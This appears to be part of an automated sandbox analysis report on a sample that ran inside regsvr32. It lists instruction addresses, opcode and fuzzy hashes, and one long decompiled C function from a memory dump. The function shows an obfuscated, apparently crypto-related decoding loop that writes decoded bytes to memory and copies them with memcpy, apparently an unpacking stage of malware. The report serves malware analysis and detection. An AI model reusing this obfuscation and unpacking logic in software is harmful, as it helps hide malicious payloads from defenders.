0x00b31895
0x00b318a1
0x00b318a8
0x00b318ae
0x00b318ae
0x00b318b5
0x00b318bb
0x00b318bc
0x00b318c0
0x00b318c3
0x00b318c3
0x00b318d0
0x00b318d3
0x00b318d7
0x00b318da
0x00b318e1
0x00b318e4
0x00b318ea
0x00b318f2
0x00b318f9
0x00b31904
0x00b31907
0x00b31907
0x00b3190a
0x00b31914
0x00b31917
0x00b31917
0x00b3191f
0x00b31926
0x00b3192c
0x00b3192d
0x00b31933
0x00b3193a
0x00b3193d
0x00b31944
0x00b31947
0x00b3194a
0x00b31953
0x00b31956
0x00b3195d
0x00b31961
0x00b31964
0x00b3196c
0x00b3196f
0x00b31972
0x00b31979
0x00b3197a
0x00b3197d
0x00b3198b
0x00b3198d
0x00b31990
0x00b31992
0x00b3199b
0x00b3199e
0x00b319a5
0x00b319a9
0x00b319ac
0x00b319ac
0x00b319b2
0x00b319ba
0x00b319c1
0x00b319ca
0x00b319d0
0x00b319d7
0x00b319da
0x00b319e3
0x00b319e6
0x00b319ef
0x00b319f2
0x00b319f9
0x00b319fd
0x00b31a00
0x00b31a0b
0x00b31a0e
0x00b31a12
0x00b31a15
0x00b31a18
0x00b31a1b
0x00b31a1c
0x00b31a1d
0x00b31a23
0x00b31a26
0x00b31a29
0x00b31a2c
0x00b31a2e
0x00b31a35
0x00b31a38
0x00b31a3b
0x00b31a41
0x00b31a4b
0x00b31a4e
0x00b31a56
0x00b31a5d
0x00b31a63
0x00b31a63
0x00b31a6d
0x00b31a72
0x00b31a7a
0x00b31a7d
0x00b31a7e
0x00b31a83
0x00b31a85
0x00b31a89
0x00b31a8c
0x00b31a93
0x00b31a96
0x00b31a99
0x00b31aa2
0x00b31aa5
0x00b31aab
0x00b31ab5
0x00b31ab8
0x00b31ac3
0x00b31aca
0x00b31acd
0x00b31ad0
0x00b31ad3
0x00b31ad4
0x00b31ad5
0x00b31adb
0x00b31ade
0x00b31ae1
0x00b31ae4
0x00b31ae6
0x00b31aed
0x00b31af0
0x00b31af3
0x00b31afc
0x00b31aff
0x00b31b05
0x00b31b0d
0x00b31b14
0x00b31b1a
0x00b31b1a
0x00b31b1d
0x00b31b23
0x00b31b34
0x00b31b37
0x00b31b41
0x00b31b44
0x00b31b4e
0x00b31b51
0x00b31b57
0x00b31b5e
0x00b31b61
0x00b31b67
0x00b31b6e
0x00b31b71
0x00b31b78
0x00b31b7b
0x00b31b7e
0x00b31b86
0x00b31b89
0x00b31b8c
0x00b31b93
0x00b31b94
0x00b31b97
0x00b31ba5
0x00b31ba7
0x00b31baa
0x00b31bac
0x00b31bb3
0x00b31bb7
0x00b31bba
0x00b31bc3
0x00b31bcc
0x00b31bcd
0x00b31bd0
0x00b31bd3
0x00b31bd3
0x00b31bdf
0x00b31be2
0x00b31be5
0x00b31be8
0x00b31bed
0x00b31bfa
0x00b31bfe
0x00b31c0a
0x00b31c11
0x00b31c17
0x00b31c17
0x00b31c18
0x00b31c1e
0x00b31c1f
0x00b31c23
0x00b31c2d
0x00b31c31
0x00b31c37
0x00b31c3e
0x00b31c44
0x00b31c47
0x00b31c4e
0x00b31c51
0x00b31c54
0x00b31c5b
0x00b31c5e
0x00b31c61
0x00b31c68
0x00b31c6c
0x00b31c6f
0x00b31c76
0x00b31c79
0x00b31c7c
0x00b31c88
0x00b31c8b
0x00b31c8e
0x00b31c95
0x00b31c96
0x00b31c99
0x00b31ca9
0x00b31cac
0x00b31cae
0x00b31cb7
0x00b31cba
0x00b31cc1
0x00b31cc4
0x00b31cc7
0x00b31ccd
0x00b31cd5
0x00b31cdc
0x00b31ce2
0x00b31cea
0x00b31ced
0x00b31cf7
0x00b31cfa
0x00b31d01
0x00b31d04
0x00b31d07
0x00b31d0d
0x00b31d17
0x00b31d1a
0x00b31d23
0x00b31d26
0x00b31d2e
0x00b31d31
0x00b31d34
0x00b31d3b
0x00b31d3c
0x00b31d3f
0x00b31d40
0x00b31d4f
0x00b31d56
0x00b31d58
0x00b31d5e
0x00b31d65
0x00b31d68
0x00b31d6e
0x00b31d75
0x00b31d78
0x00b31d78
0x00b31d7f
0x00b31d82
0x00b31d85
0x00b31d8b
0x00b31d8b
0x00b31d92
0x00b31d95
0x00b31d98
0x00b31da5
0x00b31da7
0x00b31db1
0x00b31db4
0x00b31dba
0x00b31dc2
0x00b31dc9
0x00b31dcf
0x00b31dcf
0x00b31dda
0x00b31de2
0x00b31de8
0x00b31def
0x00000000
0x00b31df5
0x00b31df8
0x00b31df8

Strings

U, xrefs: 00B31FDF

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 994f484a505473dff404a32a93c8d050e8b98c4210330b8ce8dd9d8670c4fdeb
Instruction ID: 975c49fb48a2ab86d1dbe202a280274983bc1ef96037390971652a374d564b99
Opcode Fuzzy Hash: 994f484a505473dff404a32a93c8d050e8b98c4210330b8ce8dd9d8670c4fdeb
Instruction Fuzzy Hash: 4CE24A72C04209CFEF049FA4C8897AEBBF5FF08312F05846DD8959A156E7385169CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00B31F7B, Relevance: 1.7, Strings: 1, Instructions: 453
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00B31F7B(signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t235;
				signed int _t239;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed char _t246;
				signed int _t250;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t256;
				void* _t258;
				signed int _t259;
				signed int _t260;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t268;
				void* _t269;
				signed int _t270;
				void* _t271;
				intOrPtr _t276;
				intOrPtr _t282;
				signed int _t286;
				void* _t288;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t305;
				void* _t306;
				void* _t308;
				signed int _t310;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int _t328;
				signed int _t333;
				signed int _t335;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t354;
				signed char _t357;
				signed int _t359;
				signed int _t362;
				void* _t369;
				signed int _t371;
				signed int _t373;
				signed int _t376;
				signed int _t379;
				void* _t380;
				void* _t382;
				void* _t385;
				signed int _t393;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int _t416;
				void* _t421;
				signed int* _t423;
				signed int* _t424;
				signed int* _t425;
				signed int* _t426;
				signed int* _t427;
				signed int* _t428;

				_t369 = __edi;
				_t347 = __edx;
				_t310 = __ecx;
				 *((intOrPtr*)(_t416 + 0x23)) =  *((intOrPtr*)(_t416 + 0x23)) + __edx;
				_push(0xffffff65);
				_t235 =  *0x008BFB9C();
				 *(_t416 - 0x1c) = __esi;
				 *0x008BF6F0 =  *0x008BF6F0 & 0x00000000;
				 *0x008BF6F0 =  *0x008BF6F0 ^ __esi & 0x00000000 ^ _t235;
				_t393 =  *(_t416 - 0x1c);
				if( *((intOrPtr*)(_t416 - 0x18)) == 4) {
					if( *0x008BEBA3 == 0) {
						_push(_t416);
						_t291 =  *((intOrPtr*)(0x8bfb9c))();
						 *(_t416 - 0x1c) = _t393;
						 *0x008BEBA3 =  *0x008BEBA3 & 0x00000000;
						 *0x008BEBA3 =  *0x008BEBA3 | _t393 & 0x00000000 ^ _t291;
						_t393 =  *(_t416 - 0x1c);
					}
					 *(_t416 - 8) = 1;
					 *(_t416 - 4) = 0x55;
					_push(_t393);
					 *_t423 =  *_t423 ^ _t393;
					 *_t423 =  *_t423 + 0x8bef48;
					_t286 =  *0x008BFBA0();
					_push(_t310);
					 *_t423 =  *_t423 ^ _t310;
					 *_t423 = _t286;
					_push(0x45fb78);
					 *_t423 =  *_t423 ^ 0x0045fb78;
					 *_t423 =  *_t423 + 0x8bec69;
					_t288 =  *((intOrPtr*)(0x8bfba0))();
					_t346 =  *_t423;
					_t423 = _t423 - 0xfffffffc;
					 *_t25 = _t288;
					 *(_t416 - 0x1c) =  *(_t416 - 0x1c) + _t346;
					_push( *(_t416 - 0x1c));
					_pop(_t235);
					_t393 = _t393;
					_push( *0x008BFA65);
					_pop( *_t30);
					_push( *(_t416 - 0x1c));
					_pop(_t310);
					if(_t310 > _t235) {
						_push(_t416);
						 *_t423 =  *_t423 & 0x00000000;
						 *_t423 =  *_t423 | 0x8bef48;
						_push(_t393);
						 *_t423 =  *_t423 ^ _t393;
						 *_t423 =  *_t423 | 0x8bec69;
						_t235 =  *0x008BFBA4();
					}
					 *_t423 = _t347;
					 *0x008BEF1F = 0 ^ _t235;
					_t347 = 0;
					 *(_t416 - 0x10) = 2;
					if( *0x008BF860 == 0) {
						_push( *0x008BF129);
						_t235 =  *((intOrPtr*)(0x8bfb9c))();
						 *0x008BF860 =  *0x008BF860 & 0x00000000;
						 *0x008BF860 =  *0x008BF860 ^ _t393 & 0x00000000 ^ _t235;
						_t393 = _t393;
					}
				}
				_t348 = _t347 ^ _t347;
				_t295 = 0x45fb78;
				 *_t423 = _t348;
				_t46 = _t295 + 0x45f39b; // 0x8bef13
				 *_t423 =  *_t423 & 0x00000000;
				 *_t423 =  *_t423 | _t46;
				_t239 =  *((intOrPtr*)(_t295 + 0x460028))(_t348,  *(_t416 - 0x1c), _t310);
				 *(_t416 - 0x1c) =  *(_t416 - 0x1c) & 0x00000000;
				 *_t423 =  *_t423 ^ _t239;
				_t51 = _t295 + 0x45fbbe; // 0x8bf736
				 *_t423 =  *_t423 ^ _t295;
				 *_t423 =  *_t423 ^ _t51;
				_t241 =  *((intOrPtr*)(_t295 + 0x460028))(_t295,  *(_t416 - 0x1c));
				_t424 = _t423 - 0xfffffffc;
				 *_t53 = _t241;
				 *(_t416 - 0x1c) =  *(_t416 - 0x1c) +  *_t423;
				_push( *(_t416 - 0x1c));
				_pop(_t242);
				_t371 = _t369;
				 *(_t416 - 0x1c) = _t348;
				_t316 = 0 ^  *(_t295 + 0x45fd62);
				if(_t316 > _t242) {
					_t60 = _t295 + 0x45f39b; // 0x8bef13
					 *_t424 =  *_t424 ^ _t416;
					 *_t424 =  *_t424 ^ _t60;
					_t61 = _t295 + 0x45fbbe; // 0x8bf736
					 *(_t416 - 0x1c) =  *(_t416 - 0x1c) & 0x00000000;
					 *_t424 =  *_t424 ^ _t61;
					_t242 =  *((intOrPtr*)(_t295 + 0x46002c))( *(_t416 - 0x1c), _t416);
					 *(_t295 + 0x45fad0) =  *(_t295 + 0x45fad0) & 0x00000000;
					 *(_t295 + 0x45fad0) =  *(_t295 + 0x45fad0) | _t393 & 0x00000000 ^ _t242;
					_t393 = _t393;
				}
				_t425 =  &(_t424[1]);
				_t243 = _t242 /  *(_t416 - 0x10);
				_t354 = _t242 %  *(_t416 - 0x10);
				if( *(_t295 + 0x45ff01) == 0) {
					 *(_t416 - 0x1c) = 0;
					 *_t425 =  *_t425 | _t354;
					 *_t425 =  *_t425 - _t316;
					 *_t425 =  *_t425 | _t371;
					_t243 =  *((intOrPtr*)(_t295 + 0x460024))(_t316,  *(_t416 - 0x1c));
					 *_t425 = _t393;
					 *(_t295 + 0x45ff01) = 0 ^ _t243;
					_t393 = 0;
					_t354 =  *_t425;
					_t425 = _t425 - 0xfffffffc;
				}
				_push( *((intOrPtr*)(_t416 - 0x14)));
				 *_t425 =  *_t425 - _t354;
				_pop( *_t82);
				 *(_t416 - 0x1c) = _t243;
				 *(_t416 - 0xc) = _t354;
				_t246 =  *(_t416 - 0x1c);
				if( *(_t295 + 0x45f05b) == 0) {
					_t246 =  *((intOrPtr*)(_t295 + 0x460024))( *((intOrPtr*)(_t295 + 0x45fa19)));
					_push(_t316);
					 *(_t295 + 0x45f05b) =  *(_t295 + 0x45f05b) & 0x00000000;
					 *(_t295 + 0x45f05b) =  *(_t295 + 0x45f05b) | _t316 -  *_t425 | _t246;
				}
				 *(_t416 - 0x1c) = _t295;
				_t395 = _t393 & 0x00000000 ^ _t295 & 0x00000000 ^  *(_t416 + 8);
				_t298 =  *(_t416 - 0x1c);
				_t373 = _t371 & 0x00000000 | _t354 ^  *_t425 | _t395;
				_t357 = _t354;
				if( *(_t298 + 0x45fd3a) == 0) {
					_t246 =  *((intOrPtr*)(_t298 + 0x460024))(0x7c5);
					 *(_t416 - 0x1c) = _t395;
					 *(_t298 + 0x45fd3a) =  *(_t298 + 0x45fd3a) & 0x00000000;
					 *(_t298 + 0x45fd3a) =  *(_t298 + 0x45fd3a) ^ _t395 -  *(_t416 - 0x1c) ^ _t246;
					_t395 =  *(_t416 - 0x1c);
				}
				_t396 = _t395 - 1;
				 *(_t416 - 0x1c) = 0;
				_push( *(_t416 - 0x1c));
				 *_t425 =  *_t425 + _t298;
				do {
					 *_t425 = _t416;
					_t416 = 0;
					if((_t373 &  *(_t416 - 8)) == 0) {
						_t396 = _t396 + 1;
						 *(_t416 - 0x1c) = _t298;
						_t246 = _t246 & 0x00000000 | _t298 ^  *(_t416 - 0x1c) ^  *(_t416 - 0x10);
						_t298 =  *(_t246 + _t396) & 0x000000ff;
					}
					 *(_t416 - 0x1c) = _t298;
					_t359 = _t357 & 0x00000000 ^ _t298 -  *(_t416 - 0x1c) ^  *(_t416 - 4);
					_t298 =  *(_t416 - 0x1c);
					asm("rol edx, cl");
					_t357 = _t359 & _t298;
					asm("lodsb");
					_t246 = _t246 | _t357;
					 *_t373 = _t246;
					_t373 = _t373 + 1;
					_t117 = _t416 - 0x14;
					 *_t117 =  *((intOrPtr*)(_t416 - 0x14)) - 1;
				} while ( *_t117 != 0);
				_t305 =  *_t425;
				_t426 =  &(_t425[1]);
				if( *((intOrPtr*)(_t305 + 0x45f06b)) == 0) {
					_t282 =  *((intOrPtr*)(_t305 + 0x460024))( *((intOrPtr*)(_t305 + 0x45fa94)));
					 *(_t416 - 0x1c) = _t373;
					 *((intOrPtr*)(_t305 + 0x45f06b)) = _t282;
					_t373 =  *(_t416 - 0x1c);
				}
				 *_t426 =  *_t426 - _t396;
				 *_t426 =  *_t426 | _t305 + 0x0045fd42;
				 *_t426 =  *_t426 & 0x00000000;
				 *_t426 =  *_t426 ^ _t305 + 0x0045f4d8;
				_t250 =  *((intOrPtr*)(_t305 + 0x460028))(_t357, _t396);
				 *_t426 =  *_t426 & 0x00000000;
				 *_t426 =  *_t426 ^ _t250;
				 *_t426 = _t305 + 0x45f424;
				_t252 =  *((intOrPtr*)(_t305 + 0x460028))( *(_t416 - 0x1c), _t416);
				_pop( *_t131);
				_t319 =  *(_t416 - 0x1c);
				 *_t426 =  *_t426 | _t305;
				_t306 = _t252;
				_t253 = _t306 + _t319;
				_t308 = 0;
				_t362 = _t357;
				if((_t319 & 0x00000000 | _t357 -  *_t426 ^  *(_t308 + 0x45f00f)) > _t253) {
					_t134 = _t308 + 0x45f4d8; // 0x45f4d8
					 *(_t416 - 0x1c) =  *(_t416 - 0x1c) & 0x00000000;
					 *_t426 =  *_t426 ^ _t134;
					_t138 = _t308 + 0x45f424; // 0x45f424
					 *_t426 =  *_t426 & 0x00000000;
					 *_t426 =  *_t426 ^ _t138;
					_t253 =  *((intOrPtr*)(_t308 + 0x46002c))(_t396,  *(_t416 - 0x1c));
				}
				 *(_t308 + 0x45f852) =  *(_t308 + 0x45f852) & 0x00000000;
				 *(_t308 + 0x45f852) =  *(_t308 + 0x45f852) | _t416 -  *_t426 | _t253;
				_t421 = _t416;
				_t254 =  *((intOrPtr*)(_t308 + 0x460028))();
				 *(_t421 - 0x1c) = 0;
				 *_t426 =  *_t426 ^ _t254;
				_t147 = _t308 + 0x45f561; // 0x45f561
				 *(_t421 - 0x1c) =  *(_t421 - 0x1c) & 0x00000000;
				 *_t426 =  *_t426 ^ _t147;
				_t256 =  *((intOrPtr*)(_t308 + 0x460028))( *(_t421 - 0x1c),  *(_t421 - 0x1c));
				 *_t426 =  *_t426 - _t421;
				 *_t426 =  *_t426 + _t256;
				_t152 = _t308 + 0x45faa8; // 0x45faa8
				 *_t426 = _t152;
				_t258 =  *((intOrPtr*)(_t308 + 0x460028))( *(_t421 - 0x1c), _t421);
				_pop( *_t155);
				_t323 =  *(_t421 - 0x1c);
				 *(_t421 - 0x1c) = _t373;
				_push(_t323 + _t258);
				_t376 =  *(_t421 - 0x1c);
				_pop(_t259);
				 *(_t421 - 0x1c) = _t376;
				_t379 =  *(_t421 - 0x1c);
				if((_t323 & 0x00000000 | _t376 -  *(_t421 - 0x1c) |  *(_t308 + 0x45f3cc)) > _t259) {
					_t163 = _t308 + 0x45f561; // 0x45f561
					 *(_t421 - 0x1c) = 0;
					 *_t426 =  *_t426 + _t163;
					_t166 = _t308 + 0x45faa8; // 0x45faa8
					 *(_t421 - 0x1c) =  *(_t421 - 0x1c) & 0x00000000;
					 *_t426 =  *_t426 | _t166;
					_t259 =  *((intOrPtr*)(_t308 + 0x46002c))( *(_t421 - 0x1c),  *(_t421 - 0x1c));
				}
				 *(_t421 - 0x1c) = _t362;
				 *(_t308 + 0x45ff38) =  *(_t308 + 0x45ff38) & 0x00000000;
				 *(_t308 + 0x45ff38) =  *(_t308 + 0x45ff38) | _t362 & 0x00000000 | _t259;
				_t177 = _t308 + 0x45f65c; // 0x45f65c
				_t260 = _t177;
				if( *((intOrPtr*)(_t308 + 0x45f324)) == 0) {
					 *(_t421 - 0x1c) = 0;
					 *_t426 =  *_t426 ^ _t260;
					_t276 =  *((intOrPtr*)(_t308 + 0x460024))( *((intOrPtr*)(_t308 + 0x45f807)),  *(_t421 - 0x1c));
					 *(_t421 - 0x1c) = _t396;
					 *((intOrPtr*)(_t308 + 0x45f324)) = _t276;
					_t396 =  *(_t421 - 0x1c);
					_pop( *_t186);
					_t260 = 0 +  *(_t421 - 0x1c);
				}
				 *(_t421 - 0x1c) =  *(_t421 - 0x1c) & 0x00000000;
				 *_t426 =  *_t426 | _t260;
				_t191 = _t308 + 0x45fcb6; // 0x45fcb6
				 *(_t421 - 0x1c) = 0;
				 *_t426 =  *_t426 ^ _t191;
				_t262 =  *((intOrPtr*)(_t308 + 0x460028))( *(_t421 - 0x1c),  *(_t421 - 0x1c));
				 *_t426 =  *_t426 & 0x00000000;
				 *_t426 =  *_t426 ^ _t262;
				_t195 = _t308 + 0x45f6c8; // 0x45f6c8
				 *(_t421 - 0x1c) =  *(_t421 - 0x1c) & 0x00000000;
				 *_t426 =  *_t426 ^ _t195;
				_t264 =  *((intOrPtr*)(_t308 + 0x460028))( *(_t421 - 0x1c), _t379);
				_t427 = _t426 - 0xfffffffc;
				 *_t200 = _t264;
				 *(_t421 - 0x1c) =  *(_t421 - 0x1c) +  *_t426;
				_push( *(_t421 - 0x1c));
				_pop(_t265);
				_t398 = _t396;
				 *(_t421 - 0x1c) = _t265;
				_t328 = 0 ^  *(_t308 + 0x45fee5);
				_t268 =  *(_t421 - 0x1c);
				if(_t328 > _t268) {
					_t207 = _t308 + 0x45fcb6; // 0x45fcb6
					 *(_t421 - 0x1c) = 0;
					 *_t427 =  *_t427 ^ _t207;
					_t210 = _t308 + 0x45f6c8; // 0x45f6c8
					 *_t427 =  *_t427 & 0x00000000;
					 *_t427 =  *_t427 | _t210;
					_t268 =  *((intOrPtr*)(_t308 + 0x46002c))(_t421,  *(_t421 - 0x1c));
				}
				 *(_t308 + 0x45f637) =  *(_t308 + 0x45f637) & 0x00000000;
				 *(_t308 + 0x45f637) =  *(_t308 + 0x45f637) | _t328 & 0x00000000 | _t268;
				_t269 =  *((intOrPtr*)(_t308 + 0x460028))(_t328);
				_t333 =  *_t427;
				_t428 =  &(_t427[1]);
				 *_t428 =  *_t428 | _t379;
				_t380 = _t269;
				_t270 = _t380 + _t333;
				_t382 = 0;
				_t335 = _t333 & 0x00000000 ^ _t382 -  *_t428 ^  *(_t308 + 0x45f000);
				_t385 = _t382;
				if(_t335 > _t270) {
					_t218 = _t308 + 0x45fd42; // 0x45fd42
					 *_t428 = _t218;
					_t220 = _t308 + 0x45f65c; // 0x45f65c
					 *_t428 =  *_t428 & 0x00000000;
					 *_t428 =  *_t428 + _t220;
					_t270 =  *((intOrPtr*)(_t308 + 0x46002c))(_t335,  *(_t421 - 0x1c));
				}
				 *(_t421 - 0x1c) = _t335;
				 *(_t308 + 0x45f1e8) =  *(_t308 + 0x45f1e8) & 0x00000000;
				 *(_t308 + 0x45f1e8) =  *(_t308 + 0x45f1e8) ^ _t335 -  *(_t421 - 0x1c) ^ _t270;
				 *(_t421 - 0x1c) = _t398;
				_t271 = memcpy(_t385,  *(_t421 - 0x1c) + 1,  *(_t421 - 0x1c) & 0x00000000 ^ (_t398 ^  *(_t421 - 0x1c) |  *(_t421 - 0xc)));
				_pop( *_t233);
				return _t271;
			}

0x00b31f7b
0x00b31f7b
0x00b31f7b
0x00b31f80
0x00b31f83
0x00b31f88
0x00b31f8e
0x00b31f96
0x00b31f9d
0x00b31fa3
0x00b31faa
0x00b31fb7
0x00b31fb9
0x00b31fba
0x00b31fc0
0x00b31fc8
0x00b31fcf
0x00b31fd5
0x00b31fd5
0x00b31fd8
0x00b31fdf
0x00b31fec
0x00b31fed
0x00b31ff0
0x00b31ff3
0x00b31ff9
0x00b31ffa
0x00b31ffd
0x00b32006
0x00b32007
0x00b3200a
0x00b3200d
0x00b32015
0x00b32018
0x00b3201f
0x00b32022
0x00b32025
0x00b32028
0x00b32029
0x00b3202a
0x00b32030
0x00b32033
0x00b32036
0x00b32039
0x00b32041
0x00b32042
0x00b32046
0x00b3204f
0x00b32050
0x00b32053
0x00b32056
0x00b32056
0x00b3205e
0x00b32065
0x00b3206b
0x00b3206c
0x00b3207a
0x00b3207c
0x00b32082
0x00b3208e
0x00b32095
0x00b3209b
0x00b3209b
0x00b3207a
0x00b320a1
0x00b320a3
0x00b320b4
0x00b320b7
0x00b320be
0x00b320c2
0x00b320c5
0x00b320cb
0x00b320d2
0x00b320d5
0x00b320dc
0x00b320df
0x00b320e2
0x00b320ed
0x00b320f4
0x00b320f7
0x00b320fa
0x00b320fd
0x00b320fe
0x00b320ff
0x00b3210a
0x00b32111
0x00b32113
0x00b3211a
0x00b3211d
0x00b32120
0x00b32126
0x00b3212d
0x00b32130
0x00b3213c
0x00b32143
0x00b32149
0x00b32149
0x00b32153
0x00b32156
0x00b32156
0x00b32160
0x00b32162
0x00b3216c
0x00b32170
0x00b32173
0x00b32176
0x00b3217e
0x00b32185
0x00b3218b
0x00b3218e
0x00b32191
0x00b32191
0x00b32194
0x00b32197
0x00b3219a
0x00b3219d
0x00b321a4
0x00b321a7
0x00b321b1
0x00b321b9
0x00b321bf
0x00b321c5
0x00b321cc
0x00b321d2
0x00b321d3
0x00b321df
0x00b321e1
0x00b321ed
0x00b321ef
0x00b321f7
0x00b321fe
0x00b32204
0x00b3220c
0x00b32213
0x00b32219
0x00b32219
0x00b3221c
0x00b3221d
0x00b32224
0x00b32227
0x00b3222a
0x00b3222c
0x00b32235
0x00b32239
0x00b3223b
0x00b3223c
0x00b32248
0x00b3224d
0x00b3224d
0x00b32251
0x00b3225d
0x00b3225f
0x00b32262
0x00b32264
0x00b32266
0x00b32267
0x00b32269
0x00b3226b
0x00b3226c
0x00b3226c
0x00b3226c
0x00b32273
0x00b32276
0x00b32280
0x00b32288
0x00b3228e
0x00b32295
0x00b3229b
0x00b3229b
0x00b322a5
0x00b322a8
0x00b322b2
0x00b322b6
0x00b322b9
0x00b322c0
0x00b322c4
0x00b322d0
0x00b322d3
0x00b322d9
0x00b322dc
0x00b322e1
0x00b322e5
0x00b322e8
0x00b322ea
0x00b322fa
0x00b322fd
0x00b322ff
0x00b32305
0x00b3230c
0x00b3230f
0x00b32316
0x00b3231a
0x00b3231d
0x00b3231d
0x00b32329
0x00b32330
0x00b32336
0x00b32337
0x00b3233d
0x00b32347
0x00b3234a
0x00b32350
0x00b32357
0x00b3235a
0x00b32361
0x00b32364
0x00b32367
0x00b32370
0x00b32373
0x00b3237b
0x00b3237e
0x00b32381
0x00b32388
0x00b32389
0x00b3238c
0x00b3238d
0x00b3239e
0x00b323a3
0x00b323a5
0x00b323ab
0x00b323b5
0x00b323b8
0x00b323be
0x00b323c5
0x00b323c8
0x00b323c8
0x00b323ce
0x00b323d6
0x00b323dd
0x00b323e6
0x00b323e6
0x00b323f3
0x00b323f5
0x00b323ff
0x00b32408
0x00b3240e
0x00b32415
0x00b3241b
0x00b32420
0x00b32423
0x00b32423
0x00b32426
0x00b3242d
0x00b32430
0x00b32436
0x00b32440
0x00b32443
0x00b3244a
0x00b3244e
0x00b32451
0x00b32457
0x00b3245e
0x00b32461
0x00b32470
0x00b32477
0x00b3247a
0x00b3247d
0x00b32480
0x00b32481
0x00b32482
0x00b3248d
0x00b3248f
0x00b32494
0x00b32496
0x00b3249c
0x00b324a6
0x00b324a9
0x00b324b0
0x00b324b4
0x00b324b7
0x00b324b7
0x00b324c3
0x00b324ca
0x00b324d1
0x00b324dd
0x00b324e0
0x00b324e5
0x00b324e9
0x00b324ec
0x00b324ee
0x00b324fc
0x00b324fe
0x00b32501
0x00b32503
0x00b3250c
0x00b3250f
0x00b32516
0x00b3251a
0x00b3251d
0x00b3251d
0x00b32523
0x00b3252b
0x00b32532
0x00b3253b
0x00b3254d
0x00b3254f
0x00b32556

Strings

U, xrefs: 00B31FDF

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: dbef727c2590a6842338b45f5b23e8eef0087395653a7a4219503ba8940fa054
Instruction ID: e3ef4b3dccc16a056b4ca483802d7330eb32e746208f679e7f7eb0cc62cecaf9
Opcode Fuzzy Hash: dbef727c2590a6842338b45f5b23e8eef0087395653a7a4219503ba8940fa054
Instruction Fuzzy Hash: DE123732C04209DFEF049FA4C8897AFBBF0FF08312F19846AD895AA146D7785559CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00B33E7B, Relevance: .7, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94708653c8e11bf4dcd9e8a100ad0ec2bfdd6366b6275ef2c5f53ed7baf41989
Instruction ID: 23e231689f9b082078c0ce687a63a4e98fe39282e7b7be636e5d671529dfcbd5
Opcode Fuzzy Hash: 94708653c8e11bf4dcd9e8a100ad0ec2bfdd6366b6275ef2c5f53ed7baf41989
Instruction Fuzzy Hash: 9E526B72804608EFEF049FA0C8897AEBFF1FF48322F1544ADDC85AA156D7742694CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00B31DFC, Relevance: .5, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a27fd946082159080165ddec9a047d8547c1f8564678c908f2342a12275fda
Instruction ID: 7505f5d5b763d020d49457c65228248af3d7e24f655d635f385c59b74ff68721
Opcode Fuzzy Hash: 42a27fd946082159080165ddec9a047d8547c1f8564678c908f2342a12275fda
Instruction Fuzzy Hash: 1B223632D04209CFEF049FA4C8897AEBBF1FF08312F15846ED895AA146D7782559CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00B34A05, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0eca7e1236d91c790144880867d89b8b1864d37112b94bc37ae6760ef5b380
Instruction ID: efcad466be8bc148b3d1ef57b1fd371de10915c025f095417f9a677e3c95db23
Opcode Fuzzy Hash: ca0eca7e1236d91c790144880867d89b8b1864d37112b94bc37ae6760ef5b380
Instruction Fuzzy Hash: E5615E72E04614AFEB048F99DD467BEFBF5FF84320F2586AED550A3290DB7429108B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B35F18, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e0aeb08c00460561aa533febbdc60605d05e5ef2721e49d044fb8a799a394c2
Instruction ID: e7c3be87469681061594fdfcde77759a9db0387acd06541284ef11ea5d18483d
Opcode Fuzzy Hash: 7e0aeb08c00460561aa533febbdc60605d05e5ef2721e49d044fb8a799a394c2
Instruction Fuzzy Hash: 3A815C72C00219DFEF14CFA0C9897AEBBF0FF08316F254469DC45AA156D7781954CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00B33CA2, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

